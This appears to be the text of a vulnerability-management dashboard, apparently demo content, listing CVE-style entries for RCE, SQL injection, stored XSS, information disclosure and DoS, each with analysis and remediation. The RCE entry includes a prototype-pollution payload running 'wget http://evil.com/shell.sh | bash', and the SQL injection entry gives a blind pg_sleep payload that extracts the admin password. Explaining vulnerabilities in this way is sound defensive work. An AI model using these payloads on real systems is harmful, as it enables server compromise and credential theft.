vulnerabilities

track, assess, and remediate security vulnerabilities

critical

3

action required
high

3

pending review

medium

0

in backlog

patched

1

last 30 days

project tech stacks

Threat Intel Dashboard

1
astro@5.18.1react@18.3.1typescript@5.7.3tailwindcss@3.4.17+1 more

Memory Analyzer

python@3.11volatility3@2.7.0yara@4.5.0

Buffer Overflow PoC

1
libpng@1.6.40gcc@12.2

API Gateway

2
nodejs@18.20.0express@4.19.2postgres@14.11

Web App Framework

2
nextjs@14.2.0prisma@5.15.0react@18.3.1
vulnerabilities affecting your projects
VULN-2025-004
CVE-2025-11472

Remote Code Execution in Web Application Framework

Critical RCE vulnerability in request processing pipeline allows authenticated attackers to execute arbitrary code.

Critical

severity

Critical

cvss

CVSS 9.8

status

Open

affected

v2.1.0 - v2.4.3

vulnerability analysis

The request parser incorrectly deserializes user-supplied JSON input, allowing attackers to inject malicious objects that execute arbitrary code during object initialization. The vulnerability exists in the auto-binding feature of the request processing pipeline.

technical details

vulnerable endpoint: /api/submit
vulnerable parameter: formData (JSON)

attack vector:
{
  "__proto__": {
    "exec": {
      "cmd": "wget http://evil.com/shell.sh | bash"
    }
  }
}

root cause: missing prototype pollution check in bindObject()

impact assessment

  • full server compromise possible
  • lateral movement within network
  • data exfiltration capability
  • persistence through scheduled tasks
  • no authentication bypass - requires valid session

mitigation

  • disable auto-binding feature immediately
  • implement strict JSON schema validation
  • add prototype pollution detection
  • apply patch v2.4.4 or later
  • review all request handlers for similar patterns

available patches

v2.4.4

2025-04-15

Security fix for prototype pollution vulnerability

v2.4.5

2025-04-16

Additional hardening measures

2 projects affected

Threat Intel DashboardWeb App Framework
VULN-2025-003
CVE-2025-10923

SQL Injection in Report Generator

Time-based blind SQL injection allows attackers to extract sensitive database information.

Critical

severity

Critical

cvss

CVSS 8.6

status

In Progress

affected

v1.8.0 - v1.9.2

vulnerability analysis

The report generation module fails to sanitize the 'sort' parameter before using it in ORDER BY clause. Attackers can inject SQL conditionals to extract data through timing differences.

proof of concept

endpoint: /api/reports/export
parameter: sort

payload:
sort=CASE WHEN (SELECT SUBSTRING(password,1,1) FROM users WHERE username='admin')='a' THEN pg_sleep(5) ELSE 0 END

response time > 5s indicates match

exploitation requirements

  • authenticated user with report access
  • database user must have SELECT privileges
  • vulnerable to automated extraction attacks
  • no error messages needed (blind injection)

remediation steps

  • implement parameterized queries for all SQL
  • whitelist allowed sort columns
  • add rate limiting to report endpoints
  • audit logs for suspicious query patterns
  • apply patch v1.9.3 or later

available patches

v1.9.3

2025-04-12

Fixed SQL injection in report generator

1 project affected

API Gateway
VULN-2025-002
CVE-2025-09845

Cross-Site Scripting (XSS) in User Profile

Stored XSS vulnerability allows attackers to inject malicious scripts that execute when other users view profiles.

High

severity

High

cvss

CVSS 7.5

status

Open

affected

v3.0.0 - v3.2.1

vulnerability analysis

The bio field in user profiles is not properly sanitized when displaying, allowing stored XSS. Scripts execute in the context of the viewing user, potentially stealing session tokens or performing actions on their behalf.

attack vector

field: user profile bio

payload:


triggers when any user views the attacker's profile

impact

  • session hijacking
  • unauthorized actions as victim
  • credential theft
  • privilege escalation
  • potential supply chain attacks via admin accounts

remediation

  • implement DOMPurify or similar sanitization
  • escape all user-generated content on output
  • enforce Content Security Policy headers
  • apply patch v3.2.2 or later
  • review all text input fields for similar issues

available patches

v3.2.2

2025-04-08

XSS fix for user profile fields

2 projects affected

Buffer Overflow PoCWeb App Framework
VULN-2025-001
CVE-2025-07634

Information Disclosure in API Documentation

API documentation exposes internal structure and potentially sensitive endpoint information to unauthorized users.

High

severity

High

cvss

CVSS 6.5

status

Mitigated

affected

v2.5.0 - v2.7.0

vulnerability analysis

The interactive API documentation is publicly accessible without authentication, exposing internal API endpoints, parameter structures, and example responses. This information can be used to construct targeted attacks.

exposed information

  • internal API endpoints (including admin endpoints)
  • authentication token formats
  • rate limiting configuration
  • error response structures
  • database schema hints from model definitions

risk assessment

  • facilitates automated reconnaissance
  • reduces attack planning time
  • may expose hidden privileged endpoints
  • aids in social engineering attacks

remediation actions taken

  • API docs now require authentication
  • internal endpoints removed from public docs
  • added rate limiting to docs endpoint
  • implemented IP-based access controls
  • apply patch v2.7.1 for full protection

available patches

v2.7.1

2025-04-02

Secured API documentation with authentication

1 project affected

API Gateway
other vulnerabilities
VULN-2024-015
CVE-2024-89234

Denial of Service in File Upload Handler

Malformed file uploads can cause server crashes due to unhandled exceptions.

Medium

severity

Medium

cvss

CVSS 5.3

status

Patched

affected

v1.5.0 - v1.6.4

vulnerability analysis

The file upload handler does not properly validate file structures before processing. Specially crafted files can trigger exceptions that crash the worker process, causing temporary service unavailability.

attack vector

upload endpoint: /api/files/upload

malformed file types:
- corrupted PNG headers
- invalid EXIF data structures
- truncated multipart boundaries

result: worker process crash, 500 errors

impact

  • temporary service denial
  • potential cascading failures
  • requires service restart to recover
  • no data corruption or exfiltration

remediation

  • added comprehensive file validation
  • implemented circuit breaker pattern
  • added process monitoring and auto-restart
  • apply patch v1.6.5 or later
  • all instances updated (2025-03-28)

available patches

v1.6.5

2025-03-25

Added file validation and error handling